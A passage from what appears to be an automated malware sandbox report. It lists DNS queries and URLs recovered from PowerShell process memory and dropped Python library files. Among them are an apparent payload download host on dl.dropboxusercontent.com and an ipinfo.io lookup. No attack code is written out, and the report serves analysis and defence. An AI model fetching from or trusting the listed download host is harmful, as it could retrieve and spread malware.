https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: equals www.yahoo.com (Yahoo)
            Source: global trafficDNS traffic detected: DNS query: www.dropbox.com
            Source: global trafficDNS traffic detected: DNS query: uc4fa63018fc4108da48020b9c7b.dl.dropboxusercontent.com
            Source: global trafficDNS traffic detected: DNS query: gitlab.com
            Source: global trafficDNS traffic detected: DNS query: ipinfo.io
            Source: test_xml_etree.py.19.drString found in binary or memory: http://éffbot.org/ns
            Source: _mode_siv.py.19.drString found in binary or memory: http://blog.cryptographyusering.com/2012/05/how-to-choose-authenticated-encryption.html
            Source: powershell.exe, 00000013.00000002.3330232690.000001E0D9D52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://bugs.python.org/issue2578.
            Source: powershell.exe, 00000013.00000002.3330232690.000001E0D8BFE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://bugs.python.org/issue6857.
            Source: powershell.exe, 00000013.00000002.3330232690.000001E0D8489000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3330232690.000001E0D847E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://bugs.python.org/issue7250
            Source: powershell.exe, 00000013.00000002.3330232690.000001E0D8156000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3330232690.000001E0D831C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
            Source: powershell.exe, 00000013.00000002.3330232690.000001E0D8156000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3330232690.000001E0D831C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
            Source: powershell.exe, 00000013.00000002.3330232690.000001E0D8156000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3330232690.000001E0D831C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
            Source: powershell.exe, 00000013.00000002.3330232690.000001E0D8156000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3330232690.000001E0D831C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
            Source: powershell.exe, 00000013.00000002.3330232690.000001E0D8156000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3330232690.000001E0D831C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
            Source: powershell.exe, 00000013.00000002.3330232690.000001E0D8156000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3330232690.000001E0D831C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
            Source: powershell.exe, 00000013.00000002.3330232690.000001E0D8156000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3330232690.000001E0D831C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
            Source: powershell.exe, 00000013.00000002.3330232690.000001E0D831C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
            Source: powershell.exe, 00000013.00000002.3330232690.000001E0D8156000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3330232690.000001E0D831C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
            Source: _mode_ecb.py.19.dr, _mode_cfb.py.19.drString found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf
            Source: cookiejar.py.19.drString found in binary or memory: http://curl.haxx.se/rfc/cookie_spec.html
            Source: PKCS1_OAEP.py.19.drString found in binary or memory: http://dl.acm.org/citation.cfm?id=704143)
            Source: test_xml_etree.py.19.drString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
            Source: powershell.exe, 00000013.00000002.3330232690.000001E0D9EC5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3330232690.000001E0D9EA3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3330232690.000001E0D9EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.python.org/library/unittest.html
            Source: powershell.exe, 0000000C.00000002.2230091662.000001F1200AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edge-block-www-env.dropbox-dns.com
            Source: test_xml_etree.py.19.drString found in binary or memory: http://effbot.org/ns
            Source: ARC4.cpython-312.pyc.19.drString found in binary or memory: http://eprint.iacr.org/2002/067.pdf
            Source: inC14N3.xml.19.dr, out_inC14N3_c14nDefault.xml.19.drString found in binary or memory: http://example.org
            Source: client.py.19.drString found in binary or memory: http://foo.com/
            Source: client.py.19.drString found in binary or memory: http://foo.com:/
            Source: powershell.exe, 0000000E.00000002.2404537356.0000019DE4596000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://gitlab.com
            Source: ChangeLog.19.drString found in binary or memory: http://idlefork.sourceforge.net
            Source: powershell.exe, 00000013.00000002.3330232690.000001E0D86E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3330232690.000001E0D86D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://javascript.crockford.com/tdop/tdop.html
            Source: powershell.exe, 00000013.00000002.3330232690.000001E0D845D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3330232690.000001E0D8468000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://links.twibright.com/
            Source: powershell.exe, 00000013.00000002.3330232690.000001E0D93F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://lists.sourceforge.net/lists/listinfo/optik-users).
            Source: powershell.exe, 00000013.00000002.3330232690.000001E0D845D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3330232690.000001E0D8468000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://lynx.browser.org/
            Source: test_xml_etree.py.19.drString found in binary or memory: http://namespace.invalid/does/not/exist/
            Source: powershell.exe, 0000000C.00000002.2245036004.000001F12EBF4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2245036004.000001F12EAB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2230091662.000001F120411000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2462251609.0000019DF3124000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2462251609.0000019DF2FE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2404537356.0000019DE4A0A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3429137078.000001E0E7A61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: powershell.exe, 00000013.00000002.3330232690.000001E0D8156000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3330232690.000001E0D831C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
            Source: powershell.exe, 00000013.00000002.3330232690.000001E0D8156000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3330232690.000001E0D831C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
            Source: powershell.exe, 00000013.00000002.3330232690.000001E0D8156000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3330232690.000001E0D831C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
            Source: powershell.exe, 00000013.00000002.3330232690.000001E0D8156000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3330232690.000001E0D831C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
            Source: powershell.exe, 00000013.00000002.3330232690.000001E0D94AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://opensource.apple.com/source/CF/CF-744.18/CFBinaryPList.c
            Source: powershell.exe, 00000013.00000002.3330232690.000001E0D7C17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: powershell.exe, 00000013.00000002.3330232690.000001E0D852F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3330232690.000001E0D8525000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pythonpaste.org)
            Source: test_xml_etree.py.19.drString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope
            Source: test_xml_etree.py.19.drString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
            Source: powershell.exe, 0000000C.00000002.2230091662.000001F11EA41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2404537356.0000019DE2F71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3330232690.000001E0D79F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: powershell.exe, 00000013.00000002.3330232690.000001E0D86F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
            Source: client.py.19.drString found in binary or memory: http://tools.ietf.org/html/rfc5234#appendix-B.1
            Source: client.py.19.drString found in binary or memory: http://tools.ietf.org/html/rfc7230#section-3.2)
            Source: powershell.exe, 00000013.00000002.3330232690.000001E0D9E40000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3330232690.000001E0D9E4E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://twistedmatrix.com/trac/browser/trunk/twisted/trial/runner.py
            Source: powershell.exe, 0000000C.00000002.2230091662.000001F1200AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://uc4fa63018fc4108da48020b9c7b.dl.dropboxusercontent.com
            Source: powershell.exe, 00000013.00000002.3330232690.000001E0D845D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3330232690.000001E0D8468000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://w3m.sourceforge.net/
            Source: powershell.exe, 0000000C.00000002.2230091662.000001F12006D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www-env.dropbox-dns.com
            Source: powershell.exe, 00000013.00000002.3330232690.000001E0D7C17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: powershell.exe, 00000013.00000002.3330232690.000001E0D94AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apple.com/DTDs/PropertyList-1.0.dtd
            Source: powershell.exe, 00000013.00000002.3330232690.000001E0D8BFE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.cl.cam.ac.uk/~mgk25/iso-time.html
            Source: powershell.exe, 00000013.00000002.3330232690.000001E0D82BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.cs.ucdavis.edu/~rogaway/papers/eax.pdf
            Source: _mode_siv.py.19.drString found in binary or memory: http://www.cs.ucdavis.edu/~rogaway/papers/keywrap.pdf
            Source: powershell.exe, 00000013.00000002.3330232690.000001E0D8156000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3330232690.000001E0D831C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
            Source: powershell.exe, 0000000C.00000002.2230091662.000001F12006D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.dropbox.com
            Source: gzip.py.19.drString found in binary or memory: http://www.gzip.org/#faq8
            Source: powershell.exe, 00000013.00000002.3330232690.000001E0D86F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.iana.org/assignments/character-sets
            Source: powershell.exe, 00000013.00000002.3330232690.000001E0D9698000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6
            Source: powershell.exe, 00000013.00000002.3330232690.000001E0D87D0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3330232690.000001E0D87C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.ibiblio.org/xml/examples/shakespeare/hamlet.xml
            Source: inC14N3.xml.19.dr, out_inC14N3_c14nDefault.xml.19.drString found in binary or memory: http://www.ietf.org
            Source: test.xml.out.19.drString found in binary or memory: http://www.isogen.com/paul/post-processor
            Source: pkcs1_15.py.19.drString found in binary or memory: http://www.mail-archive.com/cryptography
            Source: powershell.exe, 00000013.00000002.3330232690.000001E0D888A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3330232690.000001E0D8869000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3330232690.000001E0D8876000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.megginson.com/SAX/.
            Source: powershell.exe, 00000013.00000002.3330232690.000001E0D8BFE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.phys.uu.nl/~vgent/calendar/isocalendar.htm
            Source: powershell.exe, 00000013.00000002.3330232690.000001E0D8BBD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3330232690.000001E0D8BCA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.planetpublish.com/xmlarena/xap/Thursday/WordtoXML.pdf
            Source: ChangeLog.19.drString found in binary or memory: http://www.python.doc/current/
            Source: powershell.exe, 00000013.00000002.3330232690.000001E0D87F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3330232690.000001E0D87E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.python.org/sax/properties/encoding
            Source: powershell.exe, 00000013.00000002.3330232690.000001E0D87F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3330232690.000001E0D87E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.python.org/sax/properties/interning-dict
            Source: powershell.exe, 00000013.00000002.3330232690.000001E0D86C0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3330232690.000001E0D86B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3330232690.000001E0D86E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3330232690.000001E0D86D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3330232690.000001E0D86F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3330232690.000001E0D88CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.pythonware.com
            Source: powershell.exe, 00000013.00000002.3330232690.000001E0D9F80000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3330232690.000001E0D9F75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.robotstxt.org/norobots-rfc.txt
            Source: powershell.exe, 00000013.00000002.3330232690.000001E0D9F80000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3330232690.000001E0D9F75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sitemaps.org/protocol.html
            Source: powershell.exe, 00000013.00000002.3330232690.000001E0D88EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.xmlrpc.com/discuss/msgReader$1208
            Source: ddEncode.decTest.19.dr, ddMultiply.decTest.19.dr, dqBase.decTest.19.dr, ddFMA.decTest.19.dr, compare.decTest.19.dr, decQuad.decTest.19.dr, ddCopyNegate.decTest.19.dr, ddCanonical.decTest.19.dr, ddInvert.decTest.19.dr, ddClass.decTest.19.dr, ddToIntegral.decTest.19.dr, base.decTest.19.dr, and.decTest.19.dr, ddCompareSig.decTest.19.dr, dqCanonical.decTest.19.dr, copynegate.decTest.19.dr, ddXor.decTest.19.dr, ddMinMag.decTest.19.dr, ddNextToward.decTest.19.dr, dqCompareTotal.decTest.19.dr, dqDivide.decTest.19.drString found in binary or memory: http://www2.hursley.ibm.com/decimal
            Source: cookiejar.py.19.drString found in binary or memory: http://wwwsearch.sf.net/):
            Source: powershell.exe, 00000013.00000002.3330232690.000001E0D87E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://xml.org/sax/features/external-general-entities
            Source: powershell.exe, 00000013.00000002.3330232690.000001E0D87E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://xml.org/sax/features/external-parameter-entities
            Source: powershell.exe, 00000013.00000002.3330232690.000001E0D87F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3330232690.000001E0D87E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://xml.org/sax/features/namespace-prefixes
            Source: powershell.exe, 00000013.00000002.3330232690.000001E0D87E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://xml.org/sax/features/namespaces
            Source: powershell.exe, 00000013.00000002.3330232690.000001E0D87F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3330232690.000001E0D87E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://xml.org/sax/features/string-interning
            Source: powershell.exe, 00000013.00000002.3330232690.000001E0D87F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3330232690.000001E0D87E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://xml.org/sax/features/validation
            Source: powershell.exe, 00000013.00000002.3330232690.000001E0D87F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3330232690.000001E0D87E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://xml.org/sax/properties/declaration-handler
            Source: powershell.exe, 00000013.00000002.3330232690.000001E0D87F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3330232690.000001E0D87E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://xml.org/sax/properties/dom-node
            Source: powershell.exe, 00000013.00000002.3330232690.000001E0D87E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://xml.org/sax/properties/lexical-handler
            Source: powershell.exe, 00000013.00000002.3330232690.000001E0D87F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3330232690.000001E0D87E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://xml.org/sax/properties/xml-string
            Source: powershell.exe, 00000013.00000002.3330232690.000001E0D85A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://xml.python.org/entities/fragment-builder/internal
            Source: powershell.exe, 00000013.00000002.3330232690.000001E0D88CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://xmlrpc-epi.sourceforge.net/specs/rfc.fault_codes.php)
            Source: powershell.exe, 00000013.00000002.3330232690.000001E0D88EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://xmlrpc.usefulinc.com/doc/reserved.html
            Source: powershell.exe, 00000013.00000002.3330232690.000001E0D88EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://xmlrpc.usefulinc.com/doc/sysmethodsig.html
            Source: powershell.exe, 0000000C.00000002.2230091662.000001F12008D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2230091662.000001F12006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2230091662.000001F120091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/
            Source: powershell.exe, 0000000C.00000002.2230091662.000001F12008D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2230091662.000001F12006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2230091662.000001F120091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://a.sprig.com/
            Source: powershell.exe, 0000000C.00000002.2230091662.000001F12008D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2230091662.000001F12006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2230091662.000001F120091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/
            Source: powershell.exe, 0000000C.00000002.2230091662.000001F12008D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2230091662.000001F12006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2230091662.000001F120091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/gsi/client
            Source: powershell.exe, 0000000C.00000002.2230091662.000001F11EA41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2404537356.0000019DE2F71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3330232690.000001E0D79F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
            Source: powershell.exe, 0000000C.00000002.2230091662.000001F12008D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2230091662.000001F12006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2230091662.000001F120091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.login.yahoo.com/
            Source: powershell.exe, 0000000E.00000002.2404537356.0000019DE45B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2404537356.0000019DE4596000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
            Source: powershell.exe, 0000000C.00000002.2230091662.000001F12008D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2230091662.000001F12006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2230091662.000001F120091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://app.hellofax.com/
            Source: powershell.exe, 0000000C.00000002.2230091662.000001F12008D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2230091662.000001F12006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2230091662.000001F120091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://app.hellosign.com/
            Source: _test_eintr.py.19.drString found in binary or memory: https://bugs.freebsd.org/bugzilla/show_bug.cgi?id=203162
            Source: powershell.exe, 00000013.00000002.3330232690.000001E0D86F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bugs.python.org/issue17741
            Source: config.py.19.drString found in binary or memory: https://bugs.python.org/issue25313.
            Source: test_weakref.py.19.drString found in binary or memory: https://bugs.python.org/issue3100
            Source: _test_eintr.py.19.drString found in binary or memory: https://bugs.python.org/issue35633#msg333662
            Source: powershell.exe, 00000013.00000002.3330232690.000001E0D821B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bugs.python.org/issue43743#msg393429
            Source: ann_module8.py.19.drString found in binary or memory: https://bugs.python.org/issue46571
            Source: powershell.exe, 00000013.00000002.3330232690.000001E0D8BFE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bugs.python.org/msg352381
            Source: powershell.exe, 0000000C.00000002.2230091662.000001F12008D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2230091662.000001F12006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2230091662.000001F120091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://canny.io/sdk.js
            Source: powershell.exe, 0000000C.00000002.2230091662.000001F120091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cfl.dropboxstatic.com/static/
            Source: powershell.exe, 0000000E.00000002.2404537356.0000019DE45B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2404537356.0000019DE4596000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://collector.prd-278964.gl-product-analytics.com
            Source: powershell.exe, 00000013.00000002.3429137078.000001E0E7A61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000013.00000002.3429137078.000001E0E7A61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000013.00000002.3429137078.000001E0E7A61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: powershell.exe, 0000000E.00000002.2404537356.0000019DE45B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://customers.gitlab.com
            Source: idna.py.19.drString found in binary or memory: https://datatracker.ietf.org/doc/html/rfc5894#section-6
            Source: powershell.exe, 0000000C.00000002.2230091662.000001F12008D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2230091662.000001F12006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2230091662.000001F120091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dl-web.dropbox.com/
            Source: powershell.exe, 0000000C.00000002.2230091662.000001F12008D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2230091662.000001F12006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2230091662.000001F120091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/fsip/
            Source: powershell.exe, 0000000C.00000002.2230091662.000001F12008D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2230091662.000001F12006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2230091662.000001F120091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/fsip/
            Source: powershell.exe, 0000000C.00000002.2230091662.000001F12008D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2230091662.000001F12006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2230091662.000001F120091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/fsip/
            Source: powershell.exe, 00000013.00000002.3330232690.000001E0D8DF3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3330232690.000001E0D8E57000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64
            Source: powershell.exe, 00000013.00000002.3330232690.000001E0D831C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/using/windows.html#python-launcher-for-windows
            Source: powershell.exe, 0000000C.00000002.2230091662.000001F12008D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2230091662.000001F12006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2230091662.000001F120091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.sandbox.google.com/document/fsip/
            Source: powershell.exe, 0000000C.00000002.2230091662.000001F12008D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2230091662.000001F12006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2230091662.000001F120091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.sandbox.google.com/presentation/fsip/
            Source: powershell.exe, 0000000C.00000002.2230091662.000001F12008D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2230091662.000001F12006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2230091662.000001F120091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.sandbox.google.com/spreadsheets/fsip/
            Source: powershell.exe, 0000000C.00000002.2230091662.000001F12008D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2230091662.000001F12006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2230091662.000001F120091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docsend.com/
            Source: powershell.exe, 0000000C.00000002.2230091662.000001F12008D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2230091662.000001F12006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2230091662.000001F120091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://experience.dropbox.com/
            Source: powershell.exe, 00000013.00000002.3330232690.000001E0D83A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3330232690.000001E0D8396000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.3330232690.000001E0D83B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fishshell.com/).
            Source: powershell.exe, 00000013.00000002.3330232690.000001E0D7C17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
